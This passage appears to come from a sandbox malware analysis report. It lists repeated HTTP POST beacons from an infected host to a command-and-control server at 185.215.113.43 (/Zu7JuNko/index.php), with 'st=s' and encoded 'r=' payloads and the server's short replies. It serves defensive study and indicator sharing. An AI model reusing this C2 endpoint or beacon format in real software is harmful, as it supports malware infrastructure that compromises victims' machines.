Dec 15, 2024 00:01:55.601270914 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	50227	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:57.355972052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:58.687167883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	50228	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:00.318965912 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:01.795703888 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	50229	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:03.559578896 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:04.893331051 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	50230	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:06.543842077 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:07.918473005 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	50231	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:09.667131901 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:11.014895916 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	50232	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:12.666606903 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:14.025197983 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	50233	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:15.788089991 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:17.136809111 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	50234	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:18.793181896 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:20.128978014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	50235	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:21.874737978 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:23.230088949 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	50237	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:24.874224901 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:26.222703934 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	50239	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:27.976150036 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:29.316878080 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	50240	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:30.972048044 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:32.315853119 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	50241	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:34.061077118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:35.413052082 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	50243	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:37.049300909 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:38.397644043 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	50244	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:40.148977041 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:41.483805895 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	50246	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:43.127252102 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:44.482650995 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	50247	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:46.226021051 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:47.558223963 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	50248	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:49.191215038 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:50.545171022 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	50250	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:52.291094065 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:53.630953074 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	50251	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:55.272694111 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:02:56.608031988 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	50253	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:02:58.354504108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:02:59.686825991 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	50254	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:01.334713936 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:02.945719957 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	50256	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:04.700783014 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:06.153738976 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	50257	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:07.805248976 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:09.201387882 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	50258	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:10.945080042 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:12.286959887 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	50260	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
